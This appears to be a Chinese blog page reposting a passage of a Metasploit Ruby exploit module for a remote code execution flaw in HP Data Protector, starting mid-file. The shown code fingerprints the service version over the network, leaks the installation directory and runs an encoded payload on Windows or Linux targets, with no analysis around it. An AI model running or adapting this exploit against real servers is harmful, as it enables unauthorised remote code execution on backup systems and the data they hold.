INTEGUTIL远程代码执行漏洞(2)

日期:2020-08-24 栏目:程序人生 浏览:

if fingerprint =~ /Data Protector A\.(\d+\.\d+)/
      version = $1
      vprint_status("#{peer} - Windows / HP Data Protector version #{version} found")
    elsif fingerprint =~ / INET/
      vprint_status("#{peer} - Linux / HP Data Protector found")
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end

if Gem::Version.new(version) <= Gem::Version.new('9')
      return Exploit::CheckCode::Appears
    end

Exploit::CheckCode::Detected # there is no patch at the time of module writing
  end

def exploit
    rand_exec = rand_text_alpha(8)
    print_status("#{peer} - Leaking the HP Data Protector directory...")
    leak = leak_hp_directory(rand_exec)
    dir = parse_dir(leak, rand_exec)

if dir.nil?
      dir = default_hp_dir
      print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}")
    else
      unless valid_target?(dir)
        print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
      end
    end

if target.name =~ /Windows/
      #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
      print_status("#{peer} - Executing payload...")
      execute_windows(payload.encoded, dir)
    else
      print_status("#{peer} - Executing payload...")
      execute_linux(payload.encoded, dir)
    end
  end

def peer
    "#{rhost}:#{rport}"
  end

def build_pkt(fields)
    data = "\xff\xfe" # BOM Unicode
    fields.each do |v|
      data << "#{Rex::Text.to_unicode(v)}\x00\x00"
      data << Rex::Text.to_unicode(" ") # Separator
    end

data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
    return [data.length].pack("N") + data
  end

def get_fingerprint
    fingerprint = get_fingerprint_windows
    if fingerprint.nil?
      fingerprint = get_fingerprint_linux
    end

fingerprint
  end

def get_fingerprint_linux
    connect

sock.put([2].pack("N") + "\xff\xfe")
    begin
      res = sock.get_once(4)
    rescue EOFError
      disconnect
      return nil
    end

if res.nil?
      disconnect
      return nil
    else
      length = res.unpack("N")[0]
    end

begin
      res = sock.get_once(length)
    rescue EOFError
      return nil
    ensure
      disconnect
    end

if res.nil?
      return nil
    end

res
  end

def get_fingerprint_windows
    connect

sock.put(rand_text_alpha_upper(64))
    begin
    res = sock.get_once(4)
    rescue ::Errno::ECONNRESET, EOFError
      disconnect
      return nil
    end

if res.nil?
      disconnect
      return nil
    else
      length = res.unpack("N")[0]
    end

begin
      res = sock.get_once(length)
    rescue EOFError
      return nil
    ensure
      disconnect
    end

if res.nil?
      return nil
    end

Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
  end

上一篇:php检测数组长度函数sizeof与count用法
下一篇:php数组排序usort、uksort与sort函数用法

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/0f3ba7e9672419c766ca7feafb5be8fb.html

相关推荐